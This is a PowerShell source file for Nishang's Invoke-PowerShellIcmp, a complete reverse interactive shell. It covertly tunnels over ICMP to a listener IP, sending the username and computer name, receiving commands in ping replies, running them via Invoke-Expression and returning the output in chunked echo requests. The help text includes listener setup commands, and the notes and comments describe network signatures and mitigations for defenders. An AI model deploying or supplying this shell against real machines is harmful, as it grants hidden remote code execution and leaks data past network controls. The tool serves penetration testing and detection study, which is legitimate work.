function Invoke-PowerShellIcmp
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
.DESCRIPTION
This script can receive commands from a server, execute them and return the result to the server using only ICMP.
The server to be used with it is icmpsh_m.py from the icmpsh tools (/~https://github.com/inquisb/icmpsh).
.PARAMETER IPAddress
The IP address of the server/listener to connect to.
.PARAMETER Delay
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.
.PARAMETER BufferSize
The size of output Buffer. Default is 128.
.EXAMPLE
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
# python icmpsh_m.py 192.168.254.226 192.168.254.1
Run above commands to start a listener on a Linux computer (tested on Kali Linux).
icmpsh_m.py is a part of the icmpsh tools.
On the target, run the below command.
PS > Invoke-PowerShellIcmp -IPAddress 192.168.254.226
Above shows an example of an interactive PowerShell reverse connect shell.
.NOTES
Channel properties visible in this code (relevant to defenders and to anyone
assessing detection coverage):
- Commands arrive as the Buffer of an ICMP echo reply and command output leaves
  as the payload of ICMP echo requests, all as plain ASCII. There is no
  encryption, no authentication of the peer and no integrity check: whatever
  bytes come back in a reply are passed straight to Invoke-Expression.
- The first echo request carries a fixed "Windows PowerShell running as user ..."
  banner and later ones carry "PS <path>> " prompts; these literal strings and the
  variable-length printable payloads are a usable network signature.
- Output is split into BufferSize-sized echo requests with DontFragment set, so
  a single command can produce a burst of same-sized pings to one host.
- Restricting or inspecting outbound ICMP echo from endpoints, and alerting on
  powershell.exe generating ICMP traffic, limits this channel.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html
/~https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $false)]
[Int]
$Delay = 5,
[Parameter(Position = 2, Mandatory = $false)]
[Int]
$BufferSize = 128
)
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
# .NET Ping wrapper: every Send() below is one ICMP echo request to $IPAddress carrying the given payload bytes.
$ICMPClient = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
# Each chunk must fit in a single un-fragmented packet; the small default BufferSize keeps payloads well under typical MTUs.
$PingOptions.DontFragment = $True
# Shell appearance and output redirection based on Powerfun - Written by Ben Turner & Dave Hardy
# Fixed ASCII banner sent in the first echo request (the user and host names are included in clear text).
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
# Timeout argument is in milliseconds: 60 * 1000 = one minute for the banner and prompt sends.
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
# Poll loop: never exits on its own; the session ends only when the process or runspace is stopped.
while ($true)
{
# Empty-payload echo request acts as the poll; the listener's reply Buffer is where a command would be.
$sendbytes = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions)
#Check for Command from the server
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
# SECURITY: Invoke-Expression runs whatever text arrived in the ICMP reply. Nothing here verifies who
# answered the echo or that the bytes were not altered in transit, so any party able to supply the
# reply gets code execution in this session. Errors are merged into stdout (2>&1) and returned too.
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$sendbytes = ([text.encoding]::ASCII).GetBytes($result)
# Number of full BufferSize-sized chunks in the output.
$index = [math]::floor($sendbytes.length/$BufferSize)
$i = 0
#Fragment larger output into smaller ones to send to the server.
if ($sendbytes.length -gt $BufferSize)
{
while ($i -lt $index )
{
# Inclusive slice of one full chunk: [i*BufferSize, (i+1)*BufferSize - 1].
$sendbytes2 = $sendbytes[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
# NOTE(review): timeout here is 60 * 10000 ms (ten minutes) while banner/prompt sends use 60 * 1000 — confirm the asymmetry is intended.
$ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
$i +=1
}
# Bytes left over after the full chunks.
$remainingindex = $sendbytes.Length % $BufferSize
if ($remainingindex -ne 0)
{
# Upper bound is Length (one past the last valid index); PowerShell range slices appear to drop
# out-of-range indices, so this should still yield exactly the tail — verify on the target PS version.
$sendbytes2 = $sendbytes[($i*$BufferSize)..($sendbytes.Length)]
$ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
}
}
else
{
# Output fits in one payload; send it as a single echo request.
$ICMPClient.Send($IPAddress,60 * 10000, $sendbytes, $PingOptions) | Out-Null
}
# Fresh prompt after the output, reflecting any directory change the command made.
$sendbytes = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
}
else
{
# No command in the reply: wait $Delay seconds before polling again (sets the beacon interval).
Start-Sleep -Seconds $Delay
}
}
}